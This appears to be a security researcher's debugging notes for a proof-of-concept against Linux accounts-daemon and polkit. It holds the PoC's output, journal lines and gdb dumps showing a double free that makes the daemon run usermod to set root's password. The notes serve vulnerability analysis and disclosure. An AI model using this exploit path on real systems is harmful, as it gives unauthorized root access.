-
Notifications
You must be signed in to change notification settings - Fork 283
Expand file tree
/
Copy pathinfo.txt
More file actions
286 lines (264 loc) · 19.6 KB
/
info.txt
File metadata and controls
286 lines (264 loc) · 19.6 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
Output from poc2:
uid: 1001
pid: 1382019
home dir: /home/kev
Unique bus name (polkit): :1.40039
Received a signal in PolkitHandler.
Unique bus name (accounts): :1.40040
Received a signal in AccountsHandler.
Successfully registered with polkit
FindUserById: /org/freedesktop/Accounts/User1001
batch sizes: 3 2
accounts-daemon PID: 1506283
accounts-daemon is not running
FindUserById: /org/freedesktop/Accounts/User0
Starting exploit. PID: 1506348
trigger_bug: isError = 0
trigger_bug: isError = 1
from journalctl:
Nov 23 11:56:37 Speedy accounts-daemon[1506348]: fallback_value (FormatsLocale): 0x564cfbc8e4c0
Nov 23 11:56:37 Speedy accounts-daemon[1506348]: fallback_value (Language): 0x564cfbc89ea0
accounts-daemon logging:
(gdb) p logentry_pos
$2 = 159
(gdb) x /172wx logentries
0x564cfbb00220 <logentries>: 0x00000000 0x00000000 0x00000003 0x00000004
0x564cfbb00230 <logentries+16>: 0x00000001 0x00000002 0x00000005 0x00000001
0x564cfbb00240 <logentries+32>: 0x00000002 0x00000005 0x00000001 0x00000002
0x564cfbb00250 <logentries+48>: 0x00000005 0x00000003 0x00000004 0x00000001
0x564cfbb00260 <logentries+64>: 0x00000002 0x00000005 0x00000001 0x00000002
0x564cfbb00270 <logentries+80>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb00280 <logentries+96>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb00290 <logentries+112>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb002a0 <logentries+128>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb002b0 <logentries+144>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb002c0 <logentries+160>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb002d0 <logentries+176>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb002e0 <logentries+192>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb002f0 <logentries+208>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb00300 <logentries+224>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb00310 <logentries+240>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb00320 <logentries+256>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb00330 <logentries+272>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb00340 <logentries+288>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb00350 <logentries+304>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb00360 <logentries+320>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb00370 <logentries+336>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb00380 <logentries+352>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb00390 <logentries+368>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb003a0 <logentries+384>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb003b0 <logentries+400>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb003c0 <logentries+416>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb003d0 <logentries+432>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb003e0 <logentries+448>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb003f0 <logentries+464>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb00400 <logentries+480>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb00410 <logentries+496>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb00420 <logentries+512>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb00430 <logentries+528>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb00440 <logentries+544>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb00450 <logentries+560>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb00460 <logentries+576>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb00470 <logentries+592>: 0x00000005 0x00000001 0x00000005 0x00000001
0x564cfbb00480 <logentries+608>: 0x00000005 0x00000001 0x00000002 0x00000002
0x564cfbb00490 <logentries+624>: 0x00000002 0x00000002 0x00000006 0x00000000
0x564cfbb004a0 <logentries+640>: 0x00000000 0x00000000 0x00000000 0x00000000
0x564cfbb004b0 <logentries+656>: 0x00000000 0x00000000 0x00000000 0x00000000
0x564cfbb004c0 <logentries+672>: 0x00000000 0x00000000 0x00000000 0x00000000
polkit logging:
(gdb) p checkauthdata_pos
$3 = 161
(gdb) x /164gx checkauthdata_table
0x7f2620ca2620 <checkauthdata_table>: 0x0000564cfbd1f970 0x0000564cfbd1f970
0x7f2620ca2630 <checkauthdata_table+16>: 0x0000564cfbd0efd0 0x0000564cfbd0efd0
0x7f2620ca2640 <checkauthdata_table+32>: 0x0000564cfbc8e4c0 0x0000564cfbd1f930
0x7f2620ca2650 <checkauthdata_table+48>: 0x0000564cfbd1f930 0x0000564cfbd1e390
0x7f2620ca2660 <checkauthdata_table+64>: 0x0000564cfbd1cc80 0x0000564cfbd1cc80
0x7f2620ca2670 <checkauthdata_table+80>: 0x0000564cfbc81670 0x0000564cfbd20800
0x7f2620ca2680 <checkauthdata_table+96>: 0x0000564cfbd20800 0x0000564cfbc81c10
0x7f2620ca2690 <checkauthdata_table+112>: 0x0000564cfbc81c10 0x0000564cfbc903e0
0x7f2620ca26a0 <checkauthdata_table+128>: 0x0000564cfbc81e00 0x0000564cfbc81e00
0x7f2620ca26b0 <checkauthdata_table+144>: 0x0000564cfbd1cfe0 0x0000564cfbc927e0
0x7f2620ca26c0 <checkauthdata_table+160>: 0x0000564cfbd102d0 0x0000564cfbc7a600
0x7f2620ca26d0 <checkauthdata_table+176>: 0x0000564cfbd11a40 0x0000564cfbd1e740
0x7f2620ca26e0 <checkauthdata_table+192>: 0x0000564cfbc7fc20 0x0000564cfbd23e80
0x7f2620ca26f0 <checkauthdata_table+208>: 0x0000564cfbcd6bd0 0x0000564cfbc8e4c0
0x7f2620ca2700 <checkauthdata_table+224>: 0x0000564cfbd23f00 0x0000564cfbd21cb0
0x7f2620ca2710 <checkauthdata_table+240>: 0x0000564cfbc83800 0x0000564cfbd15f10
0x7f2620ca2720 <checkauthdata_table+256>: 0x0000564cfbd1f2e0 0x0000564cfbd16ac0
0x7f2620ca2730 <checkauthdata_table+272>: 0x0000564cfbc85ce0 0x0000564cfbd0f6a0
0x7f2620ca2740 <checkauthdata_table+288>: 0x0000564cfbc7e590 0x0000564cfbd1d350
0x7f2620ca2750 <checkauthdata_table+304>: 0x0000564cfbd18020 0x0000564cfbd17e30
0x7f2620ca2760 <checkauthdata_table+320>: 0x0000564cfbd13030 0x0000564cfbd23ea0
0x7f2620ca2770 <checkauthdata_table+336>: 0x0000564cfbd17ef0 0x0000564cfbd19310
0x7f2620ca2780 <checkauthdata_table+352>: 0x0000564cfbc81e00 0x0000564cfbd26320
0x7f2620ca2790 <checkauthdata_table+368>: 0x0000564cfbd18100 0x0000564cfbd17b60
0x7f2620ca27a0 <checkauthdata_table+384>: 0x0000564cfbd28460 0x0000564cfbc8e4c0
0x7f2620ca27b0 <checkauthdata_table+400>: 0x0000564cfbd194a0 0x0000564cfbd284e0
0x7f2620ca27c0 <checkauthdata_table+416>: 0x0000564cfbd275d0 0x0000564cfbd29380
0x7f2620ca27d0 <checkauthdata_table+432>: 0x0000564cfbd21c40 0x0000564cfbd19630
0x7f2620ca27e0 <checkauthdata_table+448>: 0x0000564cfbd17d20 0x0000564cfbd1c3e0
0x7f2620ca27f0 <checkauthdata_table+464>: 0x0000564cfbd293a0 0x0000564cfbc8e4c0
0x7f2620ca2800 <checkauthdata_table+480>: 0x0000564cfbd1e790 0x0000564cfbd2aec0
0x7f2620ca2810 <checkauthdata_table+496>: 0x0000564cfbd2af70 0x0000564cfbd2d8f0
0x7f2620ca2820 <checkauthdata_table+512>: 0x0000564cfbd2d9e0 0x0000564cfbd2da70
0x7f2620ca2830 <checkauthdata_table+528>: 0x0000564cfbd262a0 0x0000564cfbd2dd50
0x7f2620ca2840 <checkauthdata_table+544>: 0x0000564cfbd2abd0 0x0000564cfbd2bc90
0x7f2620ca2850 <checkauthdata_table+560>: 0x0000564cfbd2cbe0 0x0000564cfbd2e2d0
0x7f2620ca2860 <checkauthdata_table+576>: 0x0000564cfbd2ae40 0x0000564cfbd2d800
0x7f2620ca2870 <checkauthdata_table+592>: 0x0000564cfbd2e270 0x0000564cfbd30430
0x7f2620ca2880 <checkauthdata_table+608>: 0x0000564cfbd31210 0x0000564cfbd32820
0x7f2620ca2890 <checkauthdata_table+624>: 0x0000564cfbd310a0 0x0000564cfbd2cad0
0x7f2620ca28a0 <checkauthdata_table+640>: 0x0000564cfbd1e390 0x0000564cfbd1e390
0x7f2620ca28b0 <checkauthdata_table+656>: 0x0000564cfbd262c0 0x0000564cfbd2c820
0x7f2620ca28c0 <checkauthdata_table+672>: 0x0000564cfbd31280 0x0000564cfbd32d50
0x7f2620ca28d0 <checkauthdata_table+688>: 0x0000564cfbc829a0 0x0000564cfbd1ccd0
0x7f2620ca28e0 <checkauthdata_table+704>: 0x0000564cfbd2e040 0x0000564cfbd13050
0x7f2620ca28f0 <checkauthdata_table+720>: 0x0000564cfbd352f0 0x0000564cfbd35780
0x7f2620ca2900 <checkauthdata_table+736>: 0x0000564cfbd32c80 0x0000564cfbd364d0
0x7f2620ca2910 <checkauthdata_table+752>: 0x0000564cfbd28480 0x0000564cfbd364f0
0x7f2620ca2920 <checkauthdata_table+768>: 0x0000564cfbd34270 0x0000564cfbd35520
0x7f2620ca2930 <checkauthdata_table+784>: 0x0000564cfbd32ae0 0x0000564cfbd34080
0x7f2620ca2940 <checkauthdata_table+800>: 0x0000564cfbd34300 0x0000564cfbd37310
0x7f2620ca2950 <checkauthdata_table+816>: 0x0000564cfbd36310 0x0000564cfbd362a0
0x7f2620ca2960 <checkauthdata_table+832>: 0x0000564cfbd37680 0x0000564cfbd35760
0x7f2620ca2970 <checkauthdata_table+848>: 0x0000564cfbd38300 0x0000564cfbd34650
0x7f2620ca2980 <checkauthdata_table+864>: 0x0000564cfbd3b7e0 0x0000564cfbd3a580
0x7f2620ca2990 <checkauthdata_table+880>: 0x0000564cfbd393a0 0x0000564cfbd35570
0x7f2620ca29a0 <checkauthdata_table+896>: 0x0000564cfbd3c410 0x0000564cfbd3c430
0x7f2620ca29b0 <checkauthdata_table+912>: 0x0000564cfbc81670 0x0000564cfbd3c5a0
0x7f2620ca29c0 <checkauthdata_table+928>: 0x0000564cfbd3b450 0x0000564cfbd38470
0x7f2620ca29d0 <checkauthdata_table+944>: 0x0000564cfbd3ed50 0x0000564cfbd0f440
0x7f2620ca29e0 <checkauthdata_table+960>: 0x0000564cfbc847c0 0x0000564cfbd3eff0
0x7f2620ca29f0 <checkauthdata_table+976>: 0x0000564cfbd39b30 0x0000564cfbd39330
0x7f2620ca2a00 <checkauthdata_table+992>: 0x0000564cfbd327c0 0x0000564cfbd402c0
0x7f2620ca2a10 <checkauthdata_table+1008>: 0x0000564cfbd40430 0x0000564cfbd40240
0x7f2620ca2a20 <checkauthdata_table+1024>: 0x0000564cfbd41300 0x0000564cfbd3ee60
0x7f2620ca2a30 <checkauthdata_table+1040>: 0x0000564cfbd414a0 0x0000564cfbd41400
0x7f2620ca2a40 <checkauthdata_table+1056>: 0x0000564cfbd43ad0 0x0000564cfbd43300
0x7f2620ca2a50 <checkauthdata_table+1072>: 0x0000564cfbd41080 0x0000564cfbd3edc0
0x7f2620ca2a60 <checkauthdata_table+1088>: 0x0000564cfbd44740 0x0000564cfbd44320
0x7f2620ca2a70 <checkauthdata_table+1104>: 0x0000564cfbd43370 0x0000564cfbd41030
0x7f2620ca2a80 <checkauthdata_table+1120>: 0x0000564cfbd323f0 0x0000564cfbd41620
0x7f2620ca2a90 <checkauthdata_table+1136>: 0x0000564cfbd446e0 0x0000564cfbd3ef30
0x7f2620ca2aa0 <checkauthdata_table+1152>: 0x0000564cfbd47450 0x0000564cfbd474d0
0x7f2620ca2ab0 <checkauthdata_table+1168>: 0x0000564cfbd44610 0x0000564cfbd47470
0x7f2620ca2ac0 <checkauthdata_table+1184>: 0x0000564cfbc903e0 0x0000564cfbd476a0
0x7f2620ca2ad0 <checkauthdata_table+1200>: 0x0000564cfbd493e0 0x0000564cfbd49590
0x7f2620ca2ae0 <checkauthdata_table+1216>: 0x0000564cfbd47410 0x0000564cfbd498b0
0x7f2620ca2af0 <checkauthdata_table+1232>: 0x0000564cfbd323d0 0x0000564cfbd47110
0x7f2620ca2b00 <checkauthdata_table+1248>: 0x0000564cfbc927e0 0x0000564cfbc7a600
0x7f2620ca2b10 <checkauthdata_table+1264>: 0x0000564cfbd1e740 0x0000564cfbd23e80
0x7f2620ca2b20 <checkauthdata_table+1280>: 0x0000564cfbc8e4c0 0x0000000000000000
0x7f2620ca2b30 <checkauthdata_table+1296>: 0x0000000000000000 0x0000000000000000
stack trace:
(gdb) where
#0 0x00007f2620b40a48 in __GI___clock_nanosleep (clock_id=clock_id@entry=0, flags=flags@entry=0, req=req@entry=0x7ffd9208fc30, rem=rem@entry=0x7ffd9208fc30) at ../sysdeps/unix/sysv/linux/clock_nanosleep.c:78
#1 0x00007f2620b45957 in __GI___nanosleep (req=req@entry=0x7ffd9208fc30, rem=rem@entry=0x7ffd9208fc30) at ../sysdeps/unix/sysv/linux/nanosleep.c:25
#2 0x00007f2620b4588e in __sleep (seconds=0) at ../sysdeps/posix/sleep.c:55
#3 0x0000564cfbadff72 in user_change_password_authorized_cb (daemon=0x564cfbc660f0, user=0x564cfbc8f2f0, context=0x7f26140196a0, data=0x564cfbd17a00) at ../src/user.c:2813
#4 0x0000564cfbad5f75 in check_auth_cb (authority=0x564cfbd0b440, res=0x564cfbd29a00, data=0x564cfbd1a350) at ../src/daemon.c:1428
#5 0x00007f2620ed2fe2 in g_simple_async_result_complete (simple=0x564cfbd29a00) at ../../../gio/gsimpleasyncresult.c:802
#6 0x00007f2620c8bc8b in check_authorization_cb (proxy=0x564cfbc8a510, res=0x564cfbd256e0, user_data=0x564cfbc8e4c0) at /home/kev/projects/polkit/policykit-1-0.105/src/polkit/polkitauthority.c:854
#7 0x00007f2620ee9749 in g_task_return_now (task=0x564cfbd256e0) at ../../../gio/gtask.c:1219
#8 0x00007f2620ee994b in g_task_return (type=<optimised out>, task=0x564cfbd256e0) at ../../../gio/gtask.c:1289
#9 g_task_return (task=0x564cfbd256e0, type=<optimised out>) at ../../../gio/gtask.c:1245
#10 0x00007f2620f5204b in reply_cb (connection=<optimised out>, res=<optimised out>, user_data=user_data@entry=0x564cfbd256e0) at ../../../gio/gdbusproxy.c:2557
#11 0x00007f2620ee9749 in g_task_return_now (task=0x564cfbd14480) at ../../../gio/gtask.c:1219
#12 0x00007f2620ee994b in g_task_return (type=<optimised out>, task=0x564cfbd14480) at ../../../gio/gtask.c:1289
#13 g_task_return (task=0x564cfbd14480, type=<optimised out>) at ../../../gio/gtask.c:1245
#14 0x00007f2620f4220f in g_dbus_connection_call_done (source=<optimised out>, result=<optimised out>, user_data=user_data@entry=0x564cfbd14480) at ../../../gio/gdbusconnection.c:5789
#15 0x00007f2620ee9749 in g_task_return_now (task=0x564cfbd14540) at ../../../gio/gtask.c:1219
#16 0x00007f2620ee978d in complete_in_idle_cb (task=0x564cfbd14540) at ../../../gio/gtask.c:1233
#17 0x00007f2620d007c4 in g_main_dispatch (context=0x564cfbc4ffb0) at ../../../glib/gmain.c:3337
#18 g_main_context_dispatch (context=0x564cfbc4ffb0) at ../../../glib/gmain.c:4055
#19 0x00007f2620d53f08 in g_main_context_iterate.constprop.0 (context=0x564cfbc4ffb0, block=block@entry=1, dispatch=dispatch@entry=1, self=<optimised out>) at ../../../glib/gmain.c:4131
#20 0x00007f2620cffe43 in g_main_loop_run (loop=0x564cfbc50d60) at ../../../glib/gmain.c:4329
#21 0x0000564cfbad7ba8 in main (argc=1, argv=0x7ffd920901c8) at ../src/main.c:257
threads:
(gdb) info threads
Id Target Id Frame
* 1 Thread 0x7f2620465dc0 (LWP 1506348) "accounts-daemon" 0x00007f2620b40a48 in __GI___clock_nanosleep (clock_id=clock_id@entry=0, flags=flags@entry=0, req=req@entry=0x7ffd9208fc30, rem=rem@entry=0x7ffd9208fc30) at ../sysdeps/unix/sysv/linux/clock_nanosleep.c:78
2 Thread 0x7f261fef3640 (LWP 1506349) "gmain" 0x00007f2620b73cdf in __GI___poll (fds=0x564cfbc52660, nfds=2, timeout=3998) at ../sysdeps/unix/sysv/linux/poll.c:29
3 Thread 0x7f261eef1640 (LWP 1506351) "gdbus" 0x00007f2620b73cdf in __GI___poll (fds=0x7f2610011000, nfds=2, timeout=-1) at ../sysdeps/unix/sysv/linux/poll.c:29
A more detailed look at some of the stack frames
(gdb) up 1
#3 0x0000564cfbadff72 in user_change_password_authorized_cb (daemon=0x564cfbc660f0, user=0x564cfbc8f2f0, context=0x7f26140196a0, data=0x564cfbd17a00) at ../src/user.c:2813
2813 sleep(1);
(gdb) info args
daemon = 0x564cfbc660f0
user = 0x564cfbc8f2f0
context = 0x7f26140196a0
data = 0x564cfbd17a00
(gdb) info locals
i = 5190
strings = 0x564cfbd17a00
error = 0x0
argv = {0x564cfbaf277d "/usr/sbin/usermod", 0x564cfbaf2a07 "-p", 0x564cfbd2bc40 "$5$Fv2PqfurMmI879J7$ALSJ.w4KTP.mHrHxM2FYV3ueSipCf/QSfQUlATmWuuB", 0x564cfbaf2318 "--", 0x564cfbd0f5a0 "root", 0x0}
(gdb) p *daemon
Python Exception <class 'TypeError'>: can only concatenate str (not "NoneType") to str
$5 = {parent = {parent_instance = {parent_instance = {g_type_instance = {g_class = }, ref_count = 131, qdata = 0x0}, priv = 0x564cfbc660c0}, priv = 0x564cfbc66090}}
(gdb) p *user
Python Exception <class 'TypeError'>: can only concatenate str (not "NoneType") to str
$6 = {parent = {parent_instance = {parent_instance = {g_type_instance = {g_class = }, ref_count = 69, qdata = 0x564cfbd323a0}, priv = 0x564cfbc8f2c0}, priv = 0x564cfbc8f290}, system_bus_connection = 0x564cfbc60050, object_path = 0x0, daemon = 0x564cfbc660f0, keyfile = 0x564cfbc6fc50, gid = 0, expiration_time = -1, last_change_time = 18954, min_days_between_changes = 0, max_days_between_changes = 99999, days_to_warn = 7, days_after_expiration_until_lock = -1, login_history = 0x0, icon_file = 0x0, default_icon_file = 0x564cfbc84e00 "/root/.face", account_expiration_policy_known = 1, cached = 0, extension_ids = 0x0, n_extension_ids = 0, changed_timeout_id = 0}
(gdb) p *context
$7 = {parent_instance = {g_type_instance = {g_class = 0x564cfbc63070 [g_type: None]}, ref_count = 1, qdata = 0x7f2614020f50}, sender = 0x7f261401eb30 ":1.40040", object_path = 0x7f2614020ef0 "/org/freedesktop/Accounts/User0", interface_name = 0x7f2614020f20 "org.freedesktop.Accounts.User", method_name = 0x7f2614020e10 "SetPassword", method_info = 0x564cfbafe4a0 <_accounts_user_method_info_set_password>, property_info = 0x0, connection = 0x564cfbc60050, message = 0x7f2614013370, parameters = 0x7f261401cd20, user_data = 0x564cfbc8f2f0}
(gdb) p strings
$8 = (gchar **) 0x564cfbd17a00
(gdb) p strings[0]
$9 = (gchar *) 0x564cfbd2bc40 "$5$Fv2PqfurMmI879J7$ALSJ.w4KTP.mHrHxM2FYV3ueSipCf/QSfQUlATmWuuB"
(gdb) p strings[1]
$10 = (gchar *) 0x564cfbd1a490 "GoldenEye"
(gdb) up 1
#4 0x0000564cfbad5f75 in check_auth_cb (authority=0x564cfbd0b440, res=0x564cfbd29a00, data=0x564cfbd1a350) at ../src/daemon.c:1428
warning: Source file is more recent than executable.
1428 (* cad->authorized_cb) (cad->daemon,
(gdb) info args
authority = 0x564cfbd0b440
res = 0x564cfbd29a00
data = 0x564cfbd1a350
(gdb) info locals
cad = 0x564cfbd1a350
result = 0x564cfbd10840
error = 0x0
is_authorized = 1
(gdb) p *authority
$11 = {parent_instance = {g_type_instance = {g_class = 0x564cfbd0af90 [g_type: None]}, ref_count = 261, qdata = 0x0}, name = 0x0, version = 0x0, proxy = 0x564cfbc8a510, cancellation_id_counter = 0, initialized = 1, initialization_error = 0x0}
(gdb) p *res
$12 = <incomplete type>
(gdb) p *cad
$13 = {daemon = 0x564cfbc660f0, user = 0x564cfbc8f2f0, authorized_cb = 0x564cfbadfd3d <user_change_password_authorized_cb>, context = 0x7f26140196a0, data = 0x564cfbd17a00, destroy_notify = 0x564cfbae008d <free_passwords>}
(gdb) p *result
$14 = {parent_instance = {g_type_instance = {g_class = 0x564cfbd1e920 [g_type: None]}, ref_count = 1, qdata = 0x0}, is_authorized = 1, is_challenge = 0, details = 0x564cfbc6c0a0}
(gdb) up 1
#5 0x00007f2620ed2fe2 in g_simple_async_result_complete (simple=0x564cfbd29a00) at ../../../gio/gsimpleasyncresult.c:802
802 simple->callback (simple->source_object,
(gdb) info args
simple = 0x564cfbd29a00
(gdb) info locals
current_source = <optimised out>
current_context = <optimised out>
__func__ = "g_simple_async_result_complete"
(gdb) p *simple
$15 = {parent_instance = {g_type_instance = {g_class = 0x564cfbc62790 [g_type: None]}, ref_count = 1, qdata = 0x0}, source_object = 0x564cfbd0b440, callback = 0x564cfbad5e39 <check_auth_cb>, user_data = 0x564cfbd1a350, context = 0x564cfbc4ffb0, error = 0x0, failed = 0, handle_cancellation = 1, check_cancellable = 0x0, source_tag = 0x7f2620c8bce1 <polkit_authority_check_authorization>, op_res = {v_pointer = 0x564cfbd10840, v_boolean = -70186944, v_ssize = 94888642283584}, destroy_op_res = 0x7f2620e019f0 <g_object_unref>}
(gdb) up 1
#6 0x00007f2620c8bc8b in check_authorization_cb (proxy=0x564cfbc8a510, res=0x564cfbd256e0, user_data=0x564cfbc8e4c0) at /home/kev/projects/polkit/policykit-1-0.105/src/polkit/polkitauthority.c:854
warning: Source file is more recent than executable.
854 g_simple_async_result_complete (data->simple);
(gdb) info args
proxy = 0x564cfbc8a510
res = 0x564cfbd256e0
user_data = 0x564cfbc8e4c0
(gdb) info locals
data = 0x564cfbc8e4c0
value = 0x7f261405c440
error = 0x0
(gdb) p *proxy
$16 = {parent_instance = {g_type_instance = {g_class = 0x564cfbc5a730 [g_type: None]}, ref_count = 131, qdata = 0x564cfbd0ae80}, priv = 0x564cfbc8a4a0}
(gdb) p *res
$17 = <incomplete type>
(gdb) p *data
$18 = {authority = 0x564cfbd0b440, simple = 0x564cfbd29a00, cancellation_id = 0x0}
(gdb) p *value
$19 = {type_info = 0x7f261402fc30, size = 18446744073709551615, contents = {serialised = {bytes = 0x564cfbd49ca0, data = 0x1}, tree = {children = 0x564cfbd49ca0, n_children = 1}}, state = 4, ref_count = 1, depth = 0}
The double free happens at address 0x564cfbc8e4c0. Notice that the CheckAuthData struct has been allocated at that address (in the check_authorization_cb) stack frame. Notice that that address also appears multiple times in checkauthdata_table, so it has been used multiple times to store a CheckAuthData struct.